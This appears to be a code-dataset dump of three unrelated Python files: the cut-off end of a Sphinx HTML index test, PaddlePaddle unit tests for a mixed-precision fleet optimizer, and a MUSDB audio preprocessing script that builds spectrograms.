Test the optional sidebars in the basic theme as well as the modindex
and other generated pages.
"""
import pytest
from bs4.element import Tag
pytestmark = pytest.mark.sphinx('html', testroot='indices')
@pytest.mark.parametrize('page', ['genindex.html', ], indirect=True)
class TestBasicGenindex:
""" Turn on the optional html_sidebars in the basic theme """
def test_heading(self, page):
heading: Tag = page.select_one('h1#index')
assert heading
# The href on the link
assert 'Index' == heading.text
|
py | b4112e88860cd21ebd96400079c51e1676af8f63 | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import paddle
import paddle.fluid as fluid
import paddle.distributed.fleet as fleet
from paddle.distributed.fleet.meta_optimizers import AMPOptimizer
import os
from fleet_meta_optimizer_base import TestFleetMetaOptimizer
paddle.enable_static()
class TestFleetAMPOptimizer(TestFleetMetaOptimizer):
def test_amp_optimizer_backward(self):
""" test amp optimizer backward """
train_prog, startup_prog = fluid.Program(), fluid.Program()
avg_cost, strategy = self.net(train_prog, startup_prog)
opt = fluid.optimizer.MomentumOptimizer(
learning_rate=0.001, momentum=0.9)
opt = AMPOptimizer(opt)
opt.user_defined_strategy = strategy
params_grads = opt.backward(avg_cost, startup_prog)
ops = [op.type for op in avg_cost.block.ops]
self.assertIn('cast', ops)
self.assertNotIn('check_finite_and_unscale', ops)
def test_amp_optimizer_backward_gradients(self):
""" test amp optimizer backward + gradients"""
train_prog, startup_prog = fluid.Program(), fluid.Program()
avg_cost, strategy = self.net(train_prog, startup_prog)
opt = fluid.optimizer.MomentumOptimizer(
learning_rate=0.001, momentum=0.9)
opt = AMPOptimizer(opt)
opt.user_defined_strategy = strategy
params_grads = opt.backward(avg_cost, startup_prog)
with fluid.program_guard(train_prog, startup_prog):
opt.apply_gradients(params_grads)
ops = [op.type for op in avg_cost.block.ops]
self.assertIn('cast', ops)
self.assertIn('check_finite_and_unscale', ops)
def test_amp_optimizer_backward_optimize(self):
""" test amp optimizer backward + optimizer """
train_prog, startup_prog = fluid.Program(), fluid.Program()
avg_cost, strategy = self.net(train_prog, startup_prog)
opt = fluid.optimizer.MomentumOptimizer(
learning_rate=0.001, momentum=0.9)
opt = AMPOptimizer(opt)
opt.user_defined_strategy = strategy
params_grads = opt.backward(avg_cost, startup_prog)
opt.apply_optimize(avg_cost, startup_prog, params_grads)
ops = [op.type for op in avg_cost.block.ops]
self.assertIn('cast', ops)
self.assertIn('check_finite_and_unscale', ops)
def test_amp_optimizer(self):
""" test amp """
train_prog, startup_prog = fluid.Program(), fluid.Program()
avg_cost, strategy = self.net(train_prog, startup_prog)
self.set_strategy(strategy, 'amp')
self.optimizer(avg_cost, strategy, train_prog, startup_prog)
ops = [op.type for op in avg_cost.block.ops]
self.assertIn('cast', ops)
self.assertIn('check_finite_and_unscale', ops)
def test_amp_recompute_optimizer(self):
""" test amp + recompute """
train_prog, startup_prog = fluid.Program(), fluid.Program()
avg_cost, strategy = self.net(train_prog, startup_prog)
self.set_strategy(strategy, 'amp')
self.set_strategy(strategy, 'recompute')
self.optimizer(avg_cost, strategy, train_prog, startup_prog)
strategy = fleet._final_strategy()
ops = [op.type for op in avg_cost.block.ops]
outs = [
op.output('Out')[0] for op in avg_cost.block.ops if op.type == 'mul'
]
self.assertIn('cast', ops)
self.assertIn('check_finite_and_unscale', ops)
# recompute
self.assertIn('subprog', ''.join(outs))
def test_amp_recompute_lars_optimizer(self):
""" test amp + recompute """
train_prog, startup_prog = fluid.Program(), fluid.Program()
avg_cost, strategy = self.net(train_prog, startup_prog)
self.set_strategy(strategy, 'amp')
self.set_strategy(strategy, 'recompute')
self.set_strategy(strategy, 'lars')
self.optimizer(avg_cost, strategy, train_prog, startup_prog)
strategy = fleet._final_strategy()
ops = [op.type for op in avg_cost.block.ops]
outs = [
op.output('Out')[0] for op in avg_cost.block.ops if op.type == 'mul'
]
self.assertIn('cast', ops)
self.assertIn('check_finite_and_unscale', ops)
# recompute
self.assertIn('subprog', ''.join(outs))
# lars
self.assertIn('lars_momentum', ops)
def test_amp_recompute_lamb_optimizer(self):
train_prog, startup_prog = fluid.Program(), fluid.Program()
avg_cost, strategy = self.net(train_prog, startup_prog)
self.set_strategy(strategy, 'amp')
self.set_strategy(strategy, 'recompute')
self.set_strategy(strategy, 'lamb')
self.optimizer(avg_cost, strategy, train_prog, startup_prog, 'adam')
ops = [op.type for op in avg_cost.block.ops]
outs = [
op.output('Out')[0] for op in avg_cost.block.ops if op.type == 'mul'
]
self.assertIn('cast', ops)
self.assertIn('check_finite_and_unscale', ops)
# recompute
self.assertIn('subprog', ''.join(outs))
# lamb
self.assertIn('lamb', ops)
if __name__ == "__main__":
unittest.main()
|
py | b4112f37902079157e7075d56dc82d3c754c5b1e | import librosa
from librosa.util import find_files
from librosa import load
import os
import numpy as np
from config import *
from tqdm import tqdm
from scipy.signal import butter, filtfilt
db_train = "./musdb/train"
def butter_lowpass(cutoff, fs, order=5):
nyq = 0.5 * fs
normal_cutoff = cutoff / nyq
b, a = butter(order, normal_cutoff, btype='low', analog=False)
return b, a
def butter_lowpass_filter(data, cutoff, fs, order=5):
b, a = butter_lowpass(cutoff, fs, order=order)
y = filtfilt(b, a, data)
return y
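# --- Illustrative sketch (not part of the original preprocessing script) --------
# Quick check of the low-pass filter on a synthetic two-tone signal; the sample
# rate and cutoff below are made up for the demo and unrelated to the config
# constants used by process().
def _demo_lowpass(fs=8000, cutoff=1000):
    t = np.arange(0, 1.0, 1.0 / fs)
    # 200 Hz tone (kept) mixed with a 3000 Hz tone (attenuated by the filter)
    signal = np.sin(2 * np.pi * 200 * t) + np.sin(2 * np.pi * 3000 * t)
    return butter_lowpass_filter(signal, cutoff, fs, order=5)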
def process():
parent = os.path.dirname(os.path.dirname(db_train))
db = os.listdir(db_train)
for song_dir in tqdm(db):
song_path = db_train + '/' + song_dir
tracks = find_files(song_path,ext="wav")
# tracks[0] --> accompaniment (instrumental)
# tracks[4] --> mixture
# tracks[6] --> vocals
#inst,_ = load(tracks[0], sr=None)
mix,_ = load(tracks[4], sr=None)
vocal,_ = load(tracks[6], sr=None)
#44100 is sample rate of musdb18 dataset
mix = librosa.core.resample(mix,44100,SR)
vocal = librosa.core.resample(vocal,44100,SR)
#inst = librosa.core.resample(inst,44100,SR)
S_mix = butter_lowpass_filter(mix, window_size, SR, order=5)
S_vocal = butter_lowpass_filter(vocal, window_size, SR, order=5)
S_mix = librosa.stft(S_mix,n_fft=window_size,hop_length=hop_length).astype(np.float32)
#S_inst = np.abs(librosa.stft(inst,n_fft=window_size,hop_length=hop_length)).astype(np.float32)
S_vocal = librosa.stft(S_vocal,n_fft=window_size,hop_length=hop_length).astype(np.float32)
Y_mix = np.abs(S_mix) ** 2
#Y_inst
Y_vocal = np.abs(S_vocal) ** 2
Y_log_mix = librosa.power_to_db(Y_mix)
Y_log_vocal = librosa.power_to_db(Y_vocal)
norm1 = Y_log_mix.max()
norm2 = Y_log_vocal.max()
Y_log_mix /= norm1
#S_inst /= norm
Y_log_vocal /= norm2
spec_dir = parent + '/spectrogram/' + song_dir
np.savez(spec_dir,mix=S_mix, vocal=S_vocal)
if __name__ == '__main__':
process()
|